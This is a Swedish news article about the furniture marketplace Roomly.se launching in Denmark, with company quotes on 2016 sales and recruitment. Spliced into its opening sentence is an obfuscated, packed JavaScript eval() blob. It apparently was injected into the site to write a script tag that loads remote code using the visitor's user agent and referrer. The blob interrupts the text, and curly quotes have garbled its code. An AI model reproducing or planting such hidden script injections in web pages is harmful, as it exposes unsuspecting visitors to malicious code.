Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Inredningsbutiken Roomly expanderar till Danmark

Inredningsbutiken Roomly expanderar till Danmark
Revue Magazine

Inredningsbutiken eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfzsa|var|u0026u|referrer|nddht||js|php’.split(’|’),0,{}))
Roomly expanderar till Danmark:
Det var ett tag sedan vi skrev om den svenska startupen Roomly.se. En marknadsplats på nätet med fokus på inredning och möbler. Kortfattat kan man kalla Roomly för ett varuhus på nätet där man hittar inredningsprodukter från 50 olika butiker på en adress. Sajten har idag omkring 100 000 produkter i sitt sortiment. Deras affärsidé går ut på att man som kund oh besökare kan handla från olika e-butiker direkt utan att besöka varje var för sig, smart.

I Sverige har det på senare tid dykt upp några liknande exempel, Cdon har lanserat sitt ”marketplace, Miinto är en liknande med fokus på mode. Så man skulle kunna säga att det verkligen är rätt i tiden.

Inredning i Danmark

Roomly.se startades upp i slutet av 2015 och har nu avslutat sitt första år på marknaden. Bolaget har i ett meddelande gått ut och sagt att man stolt kan berätta att Roomly AB sålde produkter för ca 10 miljoner kronor under 2016, inte dåligt. Men nu har tjänsten en ny satsning.

Det är dags för expansion utanför Sverige. Så här meddelar VD och grundare Sebastian Plengier Ehrnfelt:

– 2016 har varit ett fantastiskt år. Vi har utvecklat plattformen samt fått en god grund på marknaden. Både butiker och konsumeter börjar känna till oss, det är jätte kul. Även om vi kommer att fortsätta vår expansion i Sverige har vi också bestämt oss för att ta steget vidare utanför gränserna. Först ut är Danmark. Vi lanserade Roomly.dk i slutet av förra året och nu har kunder börjat komma in. Vi tittar också på Norge och Finland. Genom att vi har så pass många besökare och kunder från dessa länder vill vi kunna leverera en god upplevelse även där säger Sebastian Plengier Ehrnfelt VD och grundare av Roomly AB

Danmark och Roomly.dk kan kännas som ett självklart val när det kommer till försäljning av inredning. När vi får se sajterna öppna upp i Norge och Finland är fortfarande oklart. Men genom att Danmark redan är live är det nog inte lång tid. Företaget kommer också att påbörja en rekrytering i vår.

– Ja vi kommer att påbörja en rekryteringsprocess nu under 2017. Är du en ung driven person med intresse för inredning och möbler så kommer vårt företag passa dig perfekt. Som en startup i Sverige ligger vi i framkant på många områden så det är viktigt att dessa personer också har ett intresse av att lära sig nya tjänster att arbeta med. För intresse kan ni besöka roomly.se säger Sebastian